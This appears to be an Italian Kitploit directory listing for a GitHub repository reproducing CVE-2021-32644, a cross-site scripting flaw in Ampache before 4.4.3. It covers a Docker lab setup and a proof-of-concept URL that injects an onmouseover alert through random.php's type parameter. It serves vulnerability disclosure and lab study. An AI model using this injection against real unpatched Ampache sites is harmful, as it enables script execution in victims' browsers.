Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-32644 — Ampache XSS | Kitploit
Strumenti/GitHubGitHub/dnr6419/cve-2021-32644
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubdnr6419/cve-2021-32644

CVE-2021-32644

Ampache XSS

Vedi Repository
4 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-32644

Questa vulnerabilità è una vulnerabilità XSS che ha interessato le versioni di Ampache precedenti alla 4.4.3. https://nvd.nist.gov/vuln/detail/CVE-2021-32644

Installazione ed esecuzione

1. Installazione di Ampache

Durante l'installazione, effettuare il port forwarding nel file docker-compose.yml. La versione di Ampache attualmente installata è la 4.4.2.

root@kitploit:~
 $docker-compose up  

2. Accesso ad Amapache

Navigare a http://[web-server ip]:port/

2. Accesso ad Amapache e impostazione MySQL

Navigare a http://[web-server ip]:port/ Impostare il database MySQL come mostrato nell'immagine qui sotto. image

3. PoC

Inserendo il seguente PoC, si può osservare l'attivazione della vulnerabilità XSS.

root@kitploit:~
 http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

image

Fonte

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html

Scarica lo strumento